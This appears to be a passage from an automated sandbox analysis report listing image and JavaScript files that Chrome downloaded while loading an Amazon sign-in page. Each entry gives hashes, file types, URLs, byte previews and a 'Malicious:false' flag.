                                                                                                                                                                                                                                                                Preview:......JFIF..............Exif..II*.................Ducky.......F......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:E76D9EEB4FDB11EFA1089C0DB44280A6" xmpMM:InstanceID="xmp.iid:E76D9EEA4FDB11EFA1089C0DB44280A6" xmp:CreatorTool="Adobe Photoshop 2024 Windows"> <xmpMM:DerivedFrom stRef:instanceID="BAD84EA065AEB6F4371E8144F077EB94" stRef:documentID="BAD84EA065AEB6F4371E8144F077EB94"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................... ....+!.$...2"3*7%"0....................".........................."...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26ctb%3D1%26sc0%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb0%3D402%26pc0%3D4761%26ld0%3D4761%26t0%3D1723469078779%26csmtags%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:4761
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (30956)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):31002
                                                                                                                                                                                                                                                                Entropy (8bit):5.263859562616461
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:HkhQ+LMasRxY7xky/1VXYmkDsdJS4Ok0o0MRbjigQeUpteUHiyYNDbDUhBGP95xD:AQms7kx9E4Ok2rKLP9
                                                                                                                                                                                                                                                                MD5:055C05372F5DFC6548345AC9EEAE6E31
                                                                                                                                                                                                                                                                SHA1:81AE805B0ACE186FEDAFFB681415144B73860388
                                                                                                                                                                                                                                                                SHA-256:7D14FAAF807F0DECFDF513F91AAD06F18704B4DE223201E16A638F42F91DEED9
                                                                                                                                                                                                                                                                SHA-512:E37106F6CA36CAFBF3041466F14DEA1E89C0CF7788E1536A0B82DB4D39BF15BE538FE5E793AE119AF813F75AE7DEFD68BB8D3E0832D992181CAAA089C4D57CD8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js
                                                                                                                                                                                                                                                                Preview:(()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature","cf",e),a("criticalFeature","cf",t),a("loaded","ld")),o=a("loaded","ld",e),l=(a("loaded","ld",t),a("viewablelatency:bodyBegin","bb",i),a("viewablelatency:loaded","ld",i),(e,t)=>{console.error(e,t)}),d=e=>{e.sendLatencyMetric(n),e.sendLatencyMetric(r)},c=e=>"V"===e,h={1027:"Sponsored Display DRA"},m={1:"Enabled",0:"NotEnabled","-1":"Unknown"},u=e=>v(e),v=e=>decodeURIComponent(escape(atob(e))),p=e=>e&&0===Object.keys(e).length&&e.constructor===Object;let g=null,w=null,b=null,f=null,y=null;const C=new class{viewabilityStandards(){return f=f||[],f}payload(){return b=b||{},b}},M={ext:{inViewPercentage:()=>(g=g||0,Math.round(100*g)),geom:()=>(w=w||{},w)}},x={playingTime:()=>(y=y||0,y)},E=()=>C,P=()=>x,T=e=>{var t,i,a,s;g=void 0!==(null==e|
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12571
                                                                                                                                                                                                                                                                Entropy (8bit):7.918578056569039
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:YQxx2We9K0yhkAnzHpWbO2JRKLQSW0jJqSau4ehf02tTC/C7zx6uX5ztCe8GBS:LPYK0u7dJQJ0Lau4eh82tAAxBzoGBS
                                                                                                                                                                                                                                                                MD5:3AC30A09C64477A1A143D9455417C38E
                                                                                                                                                                                                                                                                SHA1:F53FBAC6BDC74E2B7E305A97719B27E64CCB5AA0
                                                                                                                                                                                                                                                                SHA-256:45C9BD5EFB1C71BAA1F55B6E32EBF3A39CD989E16C01C6EDA0D3D7DDF125D229
                                                                                                                                                                                                                                                                SHA-512:E035510CB2E1CDDBA293F537A48751039B74E0BD03B0290DD495420D58FB6A584A2632B59AA2682C691FEA9C899AE21E251A24709A787C5B4C0677E93E590D37
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259754_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........2............................................................................:..L..S.1h...c7.............5.|.m.jq.oW..p....gkQ5......l..l.O ........W..uZ~r............k.z...+.5a.P............F..E...........I.M...zx.....?T>~.a0.#N.{.<z.n.q1..M1..d.a....kbcc...S....6..o3k.<5..hH.$..s}.O...._[.i.:...]cW.__.:{9..N..>....;8x..A..:-jOE.z.....<..g..Q?g.._.2...}g....$.W.o...E.nh....U.T{g....a....T.|.g......Ml.@...x..7&;.\7..........!.1..l.n...[........t6s.....~.#.P..S.S{g.....o.....x.{IN.^.'+..T....Vw.".0.<B=..[.>.v........g.....O #.-.2t..H.......42....._d.....<.....P'......k.....Gu........wX+p..=.7o..k..z..;..`..OqQ....9.....I..%...*.Y..[.4..2..>..e...........X+p......N.z<...=).........>y......B...00...0......"5...}r..............U.S....H...UkU..;..y.~3._0.`a..>F..X.s.E.2.>..\...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9591
                                                                                                                                                                                                                                                                Entropy (8bit):7.791668137482852
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:/IGUPl6CovaQQNZlhQyxizYvTTYrFWte8cm40RcIyl:h2kCNhhQyxiqTXttcz0RAl
                                                                                                                                                                                                                                                                MD5:9694FA621269745568E3AB6F02A4A083
                                                                                                                                                                                                                                                                SHA1:5BA67E691993DE36B59608FA8DC746BF8295DAAF
                                                                                                                                                                                                                                                                SHA-256:8F392C334F612DA0FEF6412B65AD989F857F75DCEF10DA6354F59F1EA5E1517D
                                                                                                                                                                                                                                                                SHA-512:B90FB02ECCFEF5EABDA09D22682612A378CE1451F5BE53291A48FD21A5F7EE7531EA2A994699B3D275C583F75B2839C0A7E289A9EA4253EB59C9C4418F75C6FE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2..................................................................................................X.2.[..H..%E..f......................x.U.7....Te.b..a.........3..4....................;3ZY.+l.w..=..:.I.`r.S.W......................n.....e..?,.:7..IVn..+N...fa/Q.S..o/=.................4...X.LZ...M..0+f....U.m.....Y..Rc^......................k:...."..f.,.k....3 -=G.E..h................+5..jZ.+..u....J..0...&K.,....0u.t.................9.y_Y...Ro.zy2D.....Dp..A.....f................#....;o0...Md.BN..q..#&.......s..................Hi..Wt.S...H....T^.j(...!..P.O.}..wv4.............?0.kjl...^.F..fO.N..e.q...5....P.:.=.5.N.Y`...-......'...5i.n.w"..............$T.m-.Xm........uU`.....i}!.....cq.|Xu.....r.\.m.v.V..h...............)a.[Ot.]......^..Om...v.....s.]h..^1.z.YY.E..s.............
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4095
                                                                                                                                                                                                                                                                Entropy (8bit):7.743327463635847
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:tUZqdvEba+kHCIjOTNa09i6Gw5q4fZI0fQqfD/KggfLbg3:aZqdvSarHCI2Na8X5q4hhb/wfLO
                                                                                                                                                                                                                                                                MD5:9DD28A07312AC0BE48AF4F1819E9DDF0
                                                                                                                                                                                                                                                                SHA1:FEE2552A4D89C7138F0F1995012F6C32B2FFF5C5
                                                                                                                                                                                                                                                                SHA-256:F7D82D684B552273A06E2FB456D05F0ADC4A7873E3AF2EA07D930223280ADAB0
                                                                                                                                                                                                                                                                SHA-512:618B09AB91B216E6128E15AE95268816F8BFC5ED7D2DD253C976A91476926D1767A3BA82FEF635ADF79FFDBEF2FD4C0EA95826FEBFBC8DD30197345F964D9E79
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334872_186x116_1X_en_AE_3._SY116_CB597773556_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........:.......................................................................................1...z....l.6..h%8.Tv.L...lL..e..r=.J......<C.<)X...X.{."7..=..E..............E....a.D..E...L}..D...q.u........;1V.G.....-L/.8o...?...R..jF.v.............mhkt...A.6.b...^."]".........J......q........i.Y~...ZL.K@....j{Uo..D.........#..@..............H........................4...$.3@..#%ST.....!"5CDQUt...&APdesu 1Ec.............?....H...+..g...s.#.,E..\..3.w...N..4.'.T...%8.D..iu..7..`l>.\.1...-|.'.L..L...NG....|,S....N.Jl..9...X.uK.J....b..('.Xy....~.%...$....1 ..)P..!,[..'.......[l..\.*~aAwc>Zs...._.n...7..=...f.O...ng...3.F.^W..n..|...<R.?....Kl..`.......nI..........Gr=...+|.S.N.U.c.....j...x..t..D.{.~.k...<.......'x.....E..P...... ....{.]8...n@I%j......< ....BI...(S.G..E._q..m.?/QS...n.W
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):7731
                                                                                                                                                                                                                                                                Entropy (8bit):7.902263256040312
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:c5YfkXTb9SrZkixBY2PvFD7A67e00cOJvuw:c5MkXTRSdkiA23FnA6DAZX
                                                                                                                                                                                                                                                                MD5:C7DAA631689883C30262432EF79733CB
                                                                                                                                                                                                                                                                SHA1:CB8055A864D11B78A19099AABFDD07894B889195
                                                                                                                                                                                                                                                                SHA-256:9DD65A195E96222DFA27C5A8AC7438B4EBFE36509192530888D5CF9106227F43
                                                                                                                                                                                                                                                                SHA-512:5D05E80A421156D238C4B23F545697A6E4D3585AF393DEBC8333372602A71C038BF45ABDF205140525A35634670E2E2577E3848CC2BEB9210B9A611C637DCFE5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41C6hPvag5L._SR240,220_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`.............hf....-fl............."4.....f..>.5.m...K{....aJQ.R.....1..Fh...S.G.......w.U..2.......BW.c`...k.ee.k>..h.......m........D5z..Q../#.sB.....g.5...^.,...G.......K....q...n....z.....f...<....}M.w..u..c...c........$z8.....q..1..c/.QF(.....D|.7j.5sr...._B..h.J.1..6...SSd..\...^3.^.w.2P.K....#..d.p\a#|..Q...n.g..>....~EM.E..:2./._5u)|........5...4....&o_..B.B.9...6.k.h.+G..gq..L.|NS...tno..Oc.ie.j..+.?...{.Wv.q.... .k.~.}?..:.........-....s...wN.t.1..N.7#U...|...-..q.>.K....dk.K7ue.kD.s.'c.s.i....<c...#.-..03.@+..O8...W.7../.v...6.}3.;-.>.g....7.+..,}..........-"}.OA..P.......N\i._ke..d.h.Z\.-.H................0............................!1.#02 "34@A..$`CQ..............b{....o..6!..5.........?&.!....`1H...]x..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11226
                                                                                                                                                                                                                                                                Entropy (8bit):7.889421574582735
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Y+xdKDWtCYFghY0PrSKrIdwLSAOP82dRiuTxs70FxHXwCM42DbTymm9kZ:fYxYFghb7JOPjXin70fHg7DCkZ
                                                                                                                                                                                                                                                                MD5:B71C330DA7B832FEDD32EE894DA6359D
                                                                                                                                                                                                                                                                SHA1:C406DA2D0920291CA6AAD71E9CE98D1092C3259B
                                                                                                                                                                                                                                                                SHA-256:6832010C124A2842EBB2439CC06E2379EBB86EF536952CF16D5B9F1A664592F4
                                                                                                                                                                                                                                                                SHA-512:06148C320B3C7FE6C27A2D383850D2FEE9AB92593EE94F81545B831F083C4FC79942A63275DD80785295D1BB7E6A3868D6A1F5441251A387B8289B50548A807B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................x).}W.op.D..hOjl<...............z.}m.j|.oW........kQ5.....R.w.:r.........}o.U..]..@.......oZ.v..+.5a.P.......4|.K.b.B,...........Mzl...t.......G..>..a."...gB..\8x...<N3^..C9..>o.......\u.....hH.$..y...@...}o..`..,......=~Xc.>.zy....>Z..0...&...^...).......I.P......E.nh..C..........t..O..Z.#g...j.m..-U..W..............s{.{.........0.....?F..p....,0.{*.m.)r....S...k......j....H.......Ku............. ....i.N.WwKN,..4lC.3.c..p.&..]TG;.g^....S.U.Jt.T.5~.N.....{..v..X.~x....;..........e.F.?..3Z+./".8oy.95a...q.>..5.e......Y.2%.E1.u.].`S......k.........L0z....p\.gO...Z..-...N...P.1.=...qY..hp^.8.......p8..o&...C...N.........)WiO[.^......>w.......#..^x.H....Ev.Z..umq.G..5.#...%..8.g..:.u..}........|.5.4N.....1
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (48840)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):48888
                                                                                                                                                                                                                                                                Entropy (8bit):5.316989310603465
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:1t0pkZtsaOoGHKsN3+xmxbQGdDYOeSYNkBc7J1VQzqr+JkqR6VhkPlN8Opgydi20:1t0ODIN/EOgJ1VQHZR6VO9N8OKydnpEj
                                                                                                                                                                                                                                                                MD5:54586B09CF42FDBC1BC3F8D144A9C9CE
                                                                                                                                                                                                                                                                SHA1:8792BBE8179A6965653EF878554BCF90C3807A3B
                                                                                                                                                                                                                                                                SHA-256:A67E8235A7759CE78E2B5D3F145CFB07665F37F1257D1C8B80EB0136E1DD7784
                                                                                                                                                                                                                                                                SHA-512:75F28B09EF56BBCCA53E66963F6DF228E284A2604A0692939838F0989A51B14DB0C49B1EA92E306B43DCD2AAD83E5ACD0CF427973C5F20074FEDCBBF0F564A64
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame
                                                                                                                                                                                                                                                                Preview:(()=>{function e(e){return e&&e.__esModule?e.default:e}var t=function(e){return e.replace(/_/g,":")},i=/(\/b|\/s|\/l).*(node=)(\d{1,12})/,n=new Map,a=function(){if(!n.has(window.location.href)){var e=i.exec(window.location.href),t=e&&e[3]?e[3]:null;n.set(window.location.href,t)}return n.get(window.location.href)},o=function(e){var t=a();if(!e||!t)return null;var i=e.split(":");return i.splice(i.length-1,0,t),i.join(":")},s=function(e){var t=a();return t?"".concat(e,":").concat(t):null},r={wb:"ues",bb:"uet",af:"uet",cf:"uet",be:"uet",ld:"uex"},d=function(e){var i,n,a=e.latencyEvent,r=e.scope,d=e.placement,p=e.timestamp;l(a)&&(c(a,m(r),d.id,p),c(a,m(r),t(d.name),p),c(a,m(r),null!==(i=o(d.name))&&void 0!==i?i:void 0,p),c(a,m(r),null!==(n=s(d.id))&&void 0!==n?n:void 0,p))},l=function(e){return"function"==typeof window[r[e]]},c=function(e,t,i,n){void 0===n&&(n=new Date);var a=r[e];i&&"function"==typeof window[a]&&window[a](e,t+i,{wb:1},n)},m=function(e){return"adplacements:"+p(e)},p=functio
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                Entropy (8bit):5.159855577168781
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Qs73HgB/nQn/r3Us6J9YM5UNb5IpDyXF0H1U:Z73hLUb6eaIpUUU
                                                                                                                                                                                                                                                                MD5:DEEC4DFF24B7DFF507AFE0324689C086
                                                                                                                                                                                                                                                                SHA1:C4B9CE7C0DAD9F3264DBECE3E230AC517D20EDB9
                                                                                                                                                                                                                                                                SHA-256:774883AD552C2BDA4F7B0C179C9E6FBFC80AA9BAAAE82A08CF1DBEBA022ACE94
                                                                                                                                                                                                                                                                SHA-512:E72F1A72AC2E2333BD7D649D91D2C157F214994F6F9FC17D730B900D252A78572583FA0F756FBF1A69B1DA554DE2F2DB8F1E99EE27D83C1A22BEE9E81A05D78D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01N0XAQxxjL.js?xcp
                                                                                                                                                                                                                                                                Preview:'use strict';mix_d("ZeitgeistNavFrontEndCards__p13n-zg-nav-tree-all:p13n-zg-nav-tree-all__0VRY2YcE",["exports","tslib"],function(a,b){a._operationNames=[];a.card=function(){return b.__awaiter(void 0,void 0,void 0,function(){return b.__generator(this,function(c){return[2]})})}});.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 289x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12922
                                                                                                                                                                                                                                                                Entropy (8bit):7.9443168609640145
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:DOyDHgpnKQtwGa1+kSO54vl8i80GXXguXnuLcRyJL:DOwqnhE1+M5hi80iwguLUo
                                                                                                                                                                                                                                                                MD5:550E150C7297597D8B157CAF2AA0E941
                                                                                                                                                                                                                                                                SHA1:6ED7D304E9AC5B1661923C8B4C6DFFA9D52ECDDD
                                                                                                                                                                                                                                                                SHA-256:559EAE8C84CD6A53BB16B454947873BFE94C3C54C0F1A80E2133E3A771B94DAC
                                                                                                                                                                                                                                                                SHA-512:747A4C6C6EB9158AC49597C75381BD8E3FAD747D46C723CF040F9DC8D63058907EEA44F0AFF9DB554E666FB50AB45DBDAC273EEC0EBBFC2A2269B364E69CD01F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71c2DCsZCJS._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........!.."..........4.................................................................ZHI!$....:>./..G.e.n.z-$$..Bc.yg8..o....N......|....g.tN.Y.K...8..s.....ym...$.$.>@2x$H.L....:.G....HI!$.].?...8.l.4\.....k.[.S9N..vd......R.soL.i...\.w.......$.,R$x8T.P....:.H.=,..HI!$..<..<M.c..._..w3....YN.;..... ..Y....K....;p.>_L.Oy.c.++..I$J.1t.A...5.*..v]BP?.oIOC-t.M.e$q.. }..|......e..^f..8.....(AmFXm.z.......2s....~cu.Ya...fR..E.........8I....$hY... S..QqF......[...A...I...J{3.."+.:Kz.E.g..H.4.....E..)T..n3.....3.kP..mI....j...|s.>.`..........*{...ED.Tf..0.N.....]S...{h.!...R.].<.:4>.m.YU.@.....A.!.C....`...6..}.....#,`!..0`......k:.t.\1.rk6&...#R.rM..(\R8GP....a....1D.|.".qj..........Q..%Z.......0...6A.CD'.5t!.;.Cd.t.t0p@0OP.H....G.p..#h..M.).3CU....4..b.+....[......:....9#.U.|.......Nq..y.yJc..:..p....!q
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1467054
                                                                                                                                                                                                                                                                Entropy (8bit):5.960621784851465
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:VDSWZhjZ3LSqo6aJ8jMRIFxLIJKUYZd6SPfS2dHy1D30YJmpoUM0f3jlllQRquMK:NBZhjpSl6aJjbnm3QlD
                                                                                                                                                                                                                                                                MD5:0F816DCC640E8E61CD91D8FECD506239
                                                                                                                                                                                                                                                                SHA1:80A38CE38F0ED430F527074B01A5987283E4C036
                                                                                                                                                                                                                                                                SHA-256:E74F63C33D04C3C10ACEB422221B019D0B5FA9E8C798C576E9E9DF848C26205D
                                                                                                                                                                                                                                                                SHA-512:6B78E6575C493A995B9D01CB9E727085144B349062FDF3A984B2063C05AFC0FA7B93F9F2B016F86817BD21697E236F47E4401A5F4DD8A24DED279ACC3B32D63E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("ACICAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET ACICAssets - 1.0./////////////////////////.// BEGIN FILE js/acic.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/./******
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 1242x450, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):86211
                                                                                                                                                                                                                                                                Entropy (8bit):7.974143822266519
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:yGyq6XHCrUIP2ExfMmBehopMLuOop23L2rWAHHfpCIrFkUGHXLMkXlWdERxT4Rl:+q6XCrEECma/op+L41MI3WoulWKRxT4X
                                                                                                                                                                                                                                                                MD5:5382EF236633101B41E2E4D95E49B378
                                                                                                                                                                                                                                                                SHA1:D7542A4CABA64D136966556519CDF55C48B40805
                                                                                                                                                                                                                                                                SHA-256:64949412670AC16289D60E3BDA56DB633D948DC22B088F6974D0C1836173E3CC
                                                                                                                                                                                                                                                                SHA-512:1847C9C69F26E614E6A2A455798F3FD88A443784BD2D0480DE7B3A089A401C96CEFB8F5EF62AD29F84FF7E548DA274B47A2CF15C8E3079623CAF8D76DDB1D184
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......Exif..MM.*.......i.......................~...({"systemName":"Freeway","id":"XCM_Manual_1333288_AE_MH_CN_HealthBeauty_En_1242x450_a2eaceef-6c79-4ff7-852e-75bfa7e807e9.jpg"}.....Ducky.......F......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6698c714-4270-4d04-aaa6-be4b260bfa70" xmpMM:DocumentID="xmp.did:9DB3D66EB67F11EBB17BEC042ECF912E" xmpMM:InstanceID="xmp.iid:3BA5DCDEB67E11EBB17BEC042ECF912E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3e68cfa7-75f6-440c-9418-8b8e0eef8065" stRef:documentID="adobe:docid:ph
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3683
